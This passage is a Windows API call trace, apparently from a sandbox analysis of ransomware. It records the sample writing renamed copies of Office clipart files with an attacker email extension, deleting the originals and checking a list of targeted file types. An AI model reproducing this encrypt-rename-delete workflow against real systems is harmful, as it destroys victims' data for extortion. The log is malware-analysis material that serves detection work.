lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.844] SetEndOfFile (hFile=0x384) returned 1 [0069.845] CloseHandle (hObject=0x384) returned 1 [0069.845] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099182.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0069.845] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099182.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099182.wmf")) returned 1 [0069.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099182.WMF") returned 68 [0069.845] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099182.WMF") returned 68 [0069.845] lstrlenW (lpString=".doc") returned 4 [0069.845] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0069.845] lstrlenW (lpString=".docx") returned 5 [0069.845] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0069.845] lstrlenW (lpString=".pdf") returned 4 [0069.845] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0069.845] lstrlenW (lpString=".xls") returned 4 [0069.845] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0069.846] lstrlenW (lpString=".xlsx") returned 5 [0069.846] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0069.846] lstrlenW (lpString=".ppt") returned 4 [0069.846] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0069.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099182.WMF") returned 68 [0069.846] lstrlenW (lpString=".zip") returned 4 [0069.846] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0069.846] lstrlenW (lpString=".rar") returned 4 [0069.846] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0069.846] lstrlenW (lpString=".bz2") returned 4 [0069.846] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0069.846] lstrlenW (lpString=".7z") returned 3 [0069.846] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0069.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099182.WMF") returned 68 [0069.846] lstrlenW (lpString=".dbf") returned 4 [0069.846] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0069.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099182.WMF") returned 68 [0069.846] lstrlenW (lpString=".1cd") returned 4 [0069.846] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0069.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099182.WMF") returned 68 [0069.846] lstrlenW (lpString=".jpg") returned 4 [0069.846] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0069.846] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.846] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0069.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099183.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099183.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0069.847] GetLastError () returned 0x0 [0069.847] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x1352, lpOverlapped=0x0) returned 1 [0070.345] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x1360, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x1360, lpOverlapped=0x0) returned 1 [0070.346] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.346] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.346] SetEndOfFile (hFile=0x38c) returned 1 [0070.497] CloseHandle (hObject=0x38c) returned 1 [0070.559] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.559] SetEndOfFile (hFile=0x384) returned 1 [0070.567] CloseHandle (hObject=0x384) returned 1 [0070.576] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099183.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.576] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099183.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099183.wmf")) returned 1 [0070.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099183.WMF") returned 68 [0070.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099183.WMF") returned 68 [0070.583] lstrlenW (lpString=".doc") returned 4 [0070.583] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0070.583] lstrlenW (lpString=".docx") returned 5 [0070.583] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0070.583] lstrlenW (lpString=".pdf") returned 4 [0070.583] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0070.583] lstrlenW (lpString=".xls") returned 4 [0070.583] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0070.583] lstrlenW (lpString=".xlsx") returned 5 [0070.583] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0070.583] lstrlenW (lpString=".ppt") returned 4 [0070.583] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0070.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099183.WMF") returned 68 [0070.583] lstrlenW (lpString=".zip") returned 4 [0070.583] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0070.583] lstrlenW (lpString=".rar") returned 4 [0070.583] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0070.583] lstrlenW (lpString=".bz2") returned 4 [0070.583] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0070.583] lstrlenW (lpString=".7z") returned 3 [0070.583] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0070.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099183.WMF") returned 68 [0070.583] lstrlenW (lpString=".dbf") returned 4 [0070.583] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0070.583] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099183.WMF") returned 68 [0070.583] lstrlenW (lpString=".1cd") returned 4 [0070.583] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0070.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099183.WMF") returned 68 [0070.584] lstrlenW (lpString=".jpg") returned 4 [0070.584] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0070.584] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.584] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102762.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102762.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0070.584] GetLastError () returned 0x0 [0070.584] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x2bd0, lpOverlapped=0x0) returned 1 [0070.586] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x2be0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x2be0, lpOverlapped=0x0) returned 1 [0070.587] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.587] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.587] SetEndOfFile (hFile=0x38c) returned 1 [0070.587] CloseHandle (hObject=0x38c) returned 1 [0070.587] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.587] SetEndOfFile (hFile=0x384) returned 1 [0070.588] CloseHandle (hObject=0x384) returned 1 [0070.588] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102762.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.588] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102762.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102762.wmf")) returned 1 [0070.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102762.WMF") returned 68 [0070.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102762.WMF") returned 68 [0070.588] lstrlenW (lpString=".doc") returned 4 [0070.588] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0070.588] lstrlenW (lpString=".docx") returned 5 [0070.588] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0070.588] lstrlenW (lpString=".pdf") returned 4 [0070.589] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0070.589] lstrlenW (lpString=".xls") returned 4 [0070.589] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0070.589] lstrlenW (lpString=".xlsx") returned 5 [0070.589] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0070.589] lstrlenW (lpString=".ppt") returned 4 [0070.589] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0070.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102762.WMF") returned 68 [0070.589] lstrlenW (lpString=".zip") returned 4 [0070.589] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0070.589] lstrlenW (lpString=".rar") returned 4 [0070.589] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0070.589] lstrlenW (lpString=".bz2") returned 4 [0070.589] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0070.589] lstrlenW (lpString=".7z") returned 3 [0070.589] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0070.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102762.WMF") returned 68 [0070.589] lstrlenW (lpString=".dbf") returned 4 [0070.589] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0070.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102762.WMF") returned 68 [0070.589] lstrlenW (lpString=".1cd") returned 4 [0070.589] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0070.589] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102762.WMF") returned 68 [0070.589] lstrlenW (lpString=".jpg") returned 4 [0070.589] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0070.589] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.590] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.590] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102984.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102984.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0070.590] GetLastError () returned 0x0 [0070.590] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x4290, lpOverlapped=0x0) returned 1 [0070.592] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x42a0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x42a0, lpOverlapped=0x0) returned 1 [0070.593] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.593] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.593] SetEndOfFile (hFile=0x38c) returned 1 [0070.593] CloseHandle (hObject=0x38c) returned 1 [0070.593] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.593] SetEndOfFile (hFile=0x384) returned 1 [0070.594] CloseHandle (hObject=0x384) returned 1 [0070.594] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102984.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.594] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102984.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0102984.wmf")) returned 1 [0070.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102984.WMF") returned 68 [0070.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102984.WMF") returned 68 [0070.595] lstrlenW (lpString=".doc") returned 4 [0070.595] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0070.595] lstrlenW (lpString=".docx") returned 5 [0070.595] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0070.595] lstrlenW (lpString=".pdf") returned 4 [0070.595] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0070.595] lstrlenW (lpString=".xls") returned 4 [0070.595] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0070.595] lstrlenW (lpString=".xlsx") returned 5 [0070.595] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0070.595] lstrlenW (lpString=".ppt") returned 4 [0070.595] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0070.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102984.WMF") returned 68 [0070.595] lstrlenW (lpString=".zip") returned 4 [0070.595] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0070.595] lstrlenW (lpString=".rar") returned 4 [0070.595] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0070.595] lstrlenW (lpString=".bz2") returned 4 [0070.595] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0070.595] lstrlenW (lpString=".7z") returned 3 [0070.595] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0070.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102984.WMF") returned 68 [0070.595] lstrlenW (lpString=".dbf") returned 4 [0070.595] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0070.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102984.WMF") returned 68 [0070.596] lstrlenW (lpString=".1cd") returned 4 [0070.596] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0070.596] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0102984.WMF") returned 68 [0070.596] lstrlenW (lpString=".jpg") returned 4 [0070.596] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0070.596] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.596] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.596] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103058.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103058.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0070.597] GetLastError () returned 0x0 [0070.597] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x43c0, lpOverlapped=0x0) returned 1 [0070.665] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x43d0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x43d0, lpOverlapped=0x0) returned 1 [0070.666] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.666] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.666] SetEndOfFile (hFile=0x38c) returned 1 [0070.666] CloseHandle (hObject=0x38c) returned 1 [0070.667] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.667] SetEndOfFile (hFile=0x384) returned 1 [0070.667] CloseHandle (hObject=0x384) returned 1 [0070.667] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103058.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.668] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103058.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103058.wmf")) returned 1 [0070.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103058.WMF") returned 68 [0070.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103058.WMF") returned 68 [0070.668] lstrlenW (lpString=".doc") returned 4 [0070.668] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0070.668] lstrlenW (lpString=".docx") returned 5 [0070.668] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0070.668] lstrlenW (lpString=".pdf") returned 4 [0070.668] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0070.668] lstrlenW (lpString=".xls") returned 4 [0070.668] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0070.668] lstrlenW (lpString=".xlsx") returned 5 [0070.668] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0070.668] lstrlenW (lpString=".ppt") returned 4 [0070.668] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0070.668] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103058.WMF") returned 68 [0070.668] lstrlenW (lpString=".zip") returned 4 [0070.668] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0070.669] lstrlenW (lpString=".rar") returned 4 [0070.669] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0070.669] lstrlenW (lpString=".bz2") returned 4 [0070.669] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0070.669] lstrlenW (lpString=".7z") returned 3 [0070.669] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0070.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103058.WMF") returned 68 [0070.669] lstrlenW (lpString=".dbf") returned 4 [0070.669] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0070.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103058.WMF") returned 68 [0070.669] lstrlenW (lpString=".1cd") returned 4 [0070.669] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0070.669] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103058.WMF") returned 68 [0070.669] lstrlenW (lpString=".jpg") returned 4 [0070.669] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0070.672] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.672] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.672] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103402.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103402.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0070.672] GetLastError () returned 0x0 [0070.672] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0xaf94, lpOverlapped=0x0) returned 1 [0070.710] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xafa0, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xafa0, lpOverlapped=0x0) returned 1 [0070.712] ReadFile (in: hFile=0x384, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0070.712] WriteFile (in: hFile=0x38c, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0070.712] SetEndOfFile (hFile=0x38c) returned 1 [0070.712] CloseHandle (hObject=0x38c) returned 1 [0070.712] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0070.712] SetEndOfFile (hFile=0x384) returned 1 [0070.713] CloseHandle (hObject=0x384) returned 1 [0070.713] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103402.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0070.713] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103402.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0103402.wmf")) returned 1 [0070.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103402.WMF") returned 68 [0070.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103402.WMF") returned 68 [0070.714] lstrlenW (lpString=".doc") returned 4 [0070.714] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0070.714] lstrlenW (lpString=".docx") returned 5 [0070.714] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0070.714] lstrlenW (lpString=".pdf") returned 4 [0070.714] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0070.714] lstrlenW (lpString=".xls") returned 4 [0070.714] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0070.714] lstrlenW (lpString=".xlsx") returned 5 [0070.714] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0070.714] lstrlenW (lpString=".ppt") returned 4 [0070.714] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0070.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0103402.WMF") returned 68 [0070.714] lstrlenW (lpString=".zip") returned 4 [0070.714] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0070.714] lstrlenW (lpString=".rar") returned 4 [0070.714] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0070.714] lstrlenW (lpString=".bz2") returned 4 [0070.714] lstrcmpiW (lpString1=".bz2", 